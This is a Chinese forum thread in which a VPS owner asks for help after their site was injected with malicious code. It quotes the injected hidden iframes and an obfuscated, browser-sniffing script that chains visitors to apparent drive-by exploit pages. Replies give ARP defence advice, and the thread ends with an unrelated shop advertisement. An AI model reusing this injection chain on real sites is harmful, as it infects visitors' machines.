网站被挂马,史上所说的ARP,请帮忙说说解决方法

MRLI

网页最上面有一段:! `# r- m) Z0 g0 e9 _; ]
[code]<iframe src=http://nokia-n95点8800点org/yzone/9.htm width=111 height=0 border=0></iframe>[/code]/ Q& L/ I/ Q* |' z4 |3 C5 ~
( f- F- t+ S& w
http://nokia-n95点8800点org/yzone/9.htm里面的代码为:. W- @" n* ^2 w, W( d7 l8 s. L
[code]<html>
5 A; v2 k7 B& g" e! T<iframe src=http://8lz4点cn/x80/xx.html width=111 height=0 border=0></iframe>) [0 D$ k: R( C- W, w- d- }
<br>
' L2 @( F9 ?+ H( M6 Y% N: g
6 v1 V& J# \0 }, p& l1 R6 e  T<script type="text/javascript" src="http://js点tongji点linezing.com/1240663/tongji.js"></script>
4 ?6 t1 F2 [  n) X9 L/ I9 `4 l' k5 [</html>; n3 h/ @8 w$ M0 _3 \  h
[/code]$ e: a& @7 t) A/ d+ Z1 U5 ^
) T4 F9 i! w- W

9 s1 {8 _, T" |+ w, ~http://8lz4点cn/x80/xx.html里面的代码为:
$ u8 r0 L! Z5 f% L[code]<script>
2 w2 r! c& d' [0 O4 O8 Hdocument.writeln("<script>");
4 J. ?5 ~' ~( t3 ~0 y' O( l& B6 L9 V7 }! G& d* Y; \& w5 y
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"\\x6D\"+\"\\x73\"+\"\\x69\"+\"\\x65\"+\"\\x20\"+\"\\x37\")==-1)");
. ^& x  j4 w3 Z+ o" I! |* s  m& _& e4 C: a
document.writeln("document.write(\"<iframe width=100 height=0 src=Td14.htm><\/iframe>\");");
% y3 H" n6 L  C' R7 n# y- V7 [* y, i% V/ v# P1 f8 r
document.writeln("document.write(\"<iframe width=100 height=0 src=yt.htm><\/iframe>\");");1 c/ f6 F4 b6 a6 c
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"\\x6D\"+\"\\x73\\x69\"+\"\\x65\\x20\\x37\")>0)");7 k, R3 T$ D# u! L. }& S) o3 V# M8 P
document.writeln("document.write(\"<iframe src=td09.htm width=100 height=0><\/iframe>\");");% T. N' q& {( X
document.writeln("document.write(\"<iframe src=yut.htm width=100 height=0><\/iframe>\");");
# U* e0 _7 B, Q$ n* Qdocument.writeln("<\/script>");' X! k5 b5 I4 u9 T  O
document.writeln("")
. E/ j. B6 A- @% k# [</script>+ T* P! Z( A) o

8 D. _2 n- }  j& s" L: D9 |& F: ^[/code]
, R& X+ C# F% ?) l2 g( f( l% R- Q& t) B. b
5 I* @* I: P, p6 j
请懂这方面的同鞋，说下解决方面，5 }( |  @$ v6 B3 m
服务器为：windows2003 sp1 iis6    为VPS

yangtze

装个360 arp杀毒的看看。

含笑

360arp可以防御的，不过要从根源上解决还是联系机房

Joey

联系机房让他们检查   自己装上防ARP软件 ！

MRLI

谢谢，问题是360ARP不能开启，我也装过彩影的，也不能运行，可能跟服务器版本有关。

Joey

是的  360是不支持一些服务器版本的   找机房的    最好更换下vps的密码跟网站后台的密码之类的
% [; i9 J/ f- f* s. n; z
9 n/ S3 g) p4 j& X! w7 l" S因为可能已经被嗅探到了！0 _2 m) d4 n; ^$ `5 c9 c

, o& }# d6 Z: o( Z* _: a可以考虑更换vps的服务器版本   不过要麻烦些   不然找个高手给你做静态的绑定  不过也麻烦！
/ V6 V# L+ }2 p9 b, \- q8 T4 M
不管怎样 先找机房  从源头解决了再说！

寒暇

都是高人，学习一下。

sofans

以前用过金山的arp，好像能在服务器上运行。

zergtant

首先，机房应该有相应的监控程序的，这是必须的
- a9 }7 s% Y4 _9 |+ s7 |0 N2 R$ |' q
如果机房没有，应该算是服务不到位或者说设施不完整/ W) w' Z+ Q7 F3 C
9 d2 P; `$ b: }( }' {, c
那么，自己手工绑定下mac地址吧- s1 |0 a0 I2 M, y5 T. D
arp -s 网关IP 网关MAC （网关IP照机房管理员要，没有理由不给）
* ?( d8 l; Q- d& m6 e- R/ [* ?8 nwindows比较麻烦，每次重起后还要手动绑定下
% w' p8 N  d! S: |7 P- i! _5 u具体搜 Windows 绑定MAC地址，防ARP 就可以找到文章了

zhtfly

ARP 比较好解决 如果是挂马的 就不好说了
# ^: G0 V, ^5 N, g7 i. v 登陆 FTP看看页面 有没有吧
" S! x9 Q5 j+ Q+ N3 `用LS方法 基本管用 不过是找机房管理员弄方便些

873149

母亲的爱是最令人费解的爱，她不顾一切的爱，为直到生命的最后一滴最希望... * K. F6 }3 m4 l
. D  {  }/ t* b9 B
   
1 ^$ \1 O+ R! h6 n6 S4 x   一位母亲的爱是地球上最纯净的爱，它代表了牺牲的最高水平，- L4 [2 S1 H) I' j5 v! E$ ~* k
   2010年的暑假开始了，我想让孩子真正放松一下。孩子平时的学习很紧张，而且特别
5 y7 e3 E, h$ C5 d! u' q# `努力，在这难得的假期，送给孩子一份特别的礼物、来表达妈妈对孩子的爱！( A1 \3 u! c6 e8 C' ~! x4 J2 G

6 k& F) i$ ]/ A2 o/ X" r2 z   % ?3 Z$ T# s9 j/ [. d. K
   暑假期间来qq宝贝生活馆，凉鞋帮您把您对孩子的爱带回家，给孩子一个意外的惊喜.
- B6 S- k* N/ M: v* `: s   qq宝贝生活馆6月15日-7月30日1 c, i& Z$ o" E1 C+ @
   所有凉鞋供一双95折优惠、两双9折优惠 三双85折优惠。
' [, p. ]6 b% h( x4 K( o  a& o7 \- B% r   
8 M) n* o5 N' G5 \& u9 i" W   所有服装提供一件95折优惠、两件9折优惠 三件85折优惠。
' f7 s% [5 @& h+ j8 N7 p: v; `   同时可获得会员积分、兑换礼品及参与qq宝贝的各种优惠活动。qq宝贝全体人员将以热忱专业的服务、助您的孩子身体健康、聪明伶俐
  X4 K6 ?/ Y" c" c4 E学习进步！( ?! ~8 |5 \, i1 x
   为您打造专属于您的完美的母爱礼物！联系QQ：103573223（加QQ请注明暑假促销活动）